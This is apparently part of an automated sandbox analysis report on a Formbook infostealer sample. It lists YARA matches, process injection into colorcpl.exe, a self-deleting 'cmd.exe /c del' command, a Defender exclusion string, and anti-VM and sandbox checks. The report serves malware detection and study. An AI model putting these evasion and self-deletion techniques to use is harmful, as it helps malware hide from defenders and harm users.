            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255B954
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255CE85
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255BF12
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255C795
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02542FB0
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02548C50
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02548C4B
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255B496
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255B493
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255C539
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02542D90
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02542D89
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 046FB150 appears 45 times
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: String function: 013AB150 appears 35 times
            Source: UOMp9cDcqZ.exeBinary or memory string: OriginalFilename vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exe, 00000001.00000002.256636609.0000000008D10000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameDSASignature.dll@ vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exe, 00000001.00000002.256510842.0000000008A20000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exeBinary or memory string: OriginalFilename vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exe, 00000002.00000002.315793832.0000000001353000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exe, 00000002.00000002.316166419.000000000162F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exeBinary or memory string: OriginalFilenameOrderablePartitioner.exeZ vs UOMp9cDcqZ.exe
            Source: UOMp9cDcqZ.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
            Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000000.245316233.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.494486167.0000000004490000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.315392989.0000000000DE0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.492679624.0000000002540000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.314958304.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000001.00000002.249409272.0000000003B69000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000002.00000002.315613623.0000000000EF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 0000000F.00000002.494513701.00000000044C0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 1.2.UOMp9cDcqZ.exe.3c4b958.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.0.UOMp9cDcqZ.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 2.2.UOMp9cDcqZ.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: UOMp9cDcqZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winEXE@8/1@10/6
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\UOMp9cDcqZ.exe.logJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5880:120:WilError_01
            Source: UOMp9cDcqZ.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: Select * from Clientes WHERE id=@id;;
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE id=@id;
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
            Source: UOMp9cDcqZ.exeVirustotal: Detection: 16%
            Source: UOMp9cDcqZ.exeMetadefender: Detection: 22%
            Source: UOMp9cDcqZ.exeReversingLabs: Detection: 50%
            Source: unknownProcess created: C:\Users\user\Desktop\UOMp9cDcqZ.exe 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess created: C:\Users\user\Desktop\UOMp9cDcqZ.exe C:\Users\user\Desktop\UOMp9cDcqZ.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autochk.exe C:\Windows\SysWOW64\autochk.exe
            Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess created: C:\Users\user\Desktop\UOMp9cDcqZ.exe C:\Users\user\Desktop\UOMp9cDcqZ.exe
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UOMp9cDcqZ.exe'
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: UOMp9cDcqZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: UOMp9cDcqZ.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: UOMp9cDcqZ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\ESxPeVCqHk\src\obj\x86\Debug\OrderablePartitioner.pdb source: UOMp9cDcqZ.exe
            Source: Binary string: colorcpl.pdbGCTL source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
            Source: Binary string: colorcpl.pdb source: UOMp9cDcqZ.exe, 00000002.00000002.315780630.0000000001350000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: UOMp9cDcqZ.exe, 00000002.00000003.245683230.0000000001050000.00000004.00000001.sdmp, colorcpl.exe, 0000000F.00000002.494600161.00000000046D0000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: UOMp9cDcqZ.exe, colorcpl.exe

            Data Obfuscation:

            barindex
            .NET source code contains potential unpackerShow sources
            Source: UOMp9cDcqZ.exe, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.0.UOMp9cDcqZ.exe.6e0000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 1.2.UOMp9cDcqZ.exe.6e0000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.UOMp9cDcqZ.exe.860000.2.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.0.UOMp9cDcqZ.exe.860000.0.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 2.2.UOMp9cDcqZ.exe.860000.1.unpack, Aspiring_Rookie/DebuggableAttribute.cs.Net Code: FillRecta System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_0E613656 push cs; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_0E6112B0 push cs; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 1_2_0E6112BA push cs; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041B2A2 push cs; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041B3F2 push eax; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041B3FB push eax; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041B3A5 push eax; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041B45C push eax; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_00415414 push esp; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_00414F46 push cs; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_0041BF12 push dword ptr [8427D5C5h]; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_00415FC5 push ebp; ret
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_013FD0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0474D0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255B2A2 push cs; ret
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255B3F2 push eax; ret
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255B3FB push eax; ret
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255B3A5 push eax; ret
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02554F46 push cs; ret
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255BF12 push dword ptr [8427D5C5h]; ret
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02555FC5 push ebp; ret
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0255B45C push eax; ret
            Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02555414 push esp; ret
            Source: initial sampleStatic PE information: section name: .text entropy: 7.86649805273
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\colorcpl.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Yara detected AntiVM3Show sources
            Source: Yara matchFile source: 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: UOMp9cDcqZ.exe PID: 5852, type: MEMORY
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
            Tries to detect virtualization through RDTSC time measurementsShow sources
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 00000000025485E4 second address: 00000000025485EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 000000000254896E second address: 0000000002548974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeCode function: 2_2_004088A0 rdtsc
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe TID: 5336Thread sleep time: -99749s >= -30000s
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exe TID: 204Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe TID: 3320Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1704Thread sleep time: -32000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\colorcpl.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeThread delayed: delay time: 99749
            Source: C:\Users\user\Desktop\UOMp9cDcqZ.exeThread delayed: delay time: 922337203685477
            Source: explorer.exe, 00000003.00000000.277219215.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: explorer.exe, 00000003.00000000.277219215.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: explorer.exe, 00000003.00000000.288826880.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
            Source: UOMp9cDcqZ.exe, 00000001.00000002.249022174.0000000002BA4000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.277277771.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
            Source: explorer.exe, 00000003.00000000.267541205.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
            Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000003.00000000.276611903.0000000008270000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 00000003.00000000.277277771.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
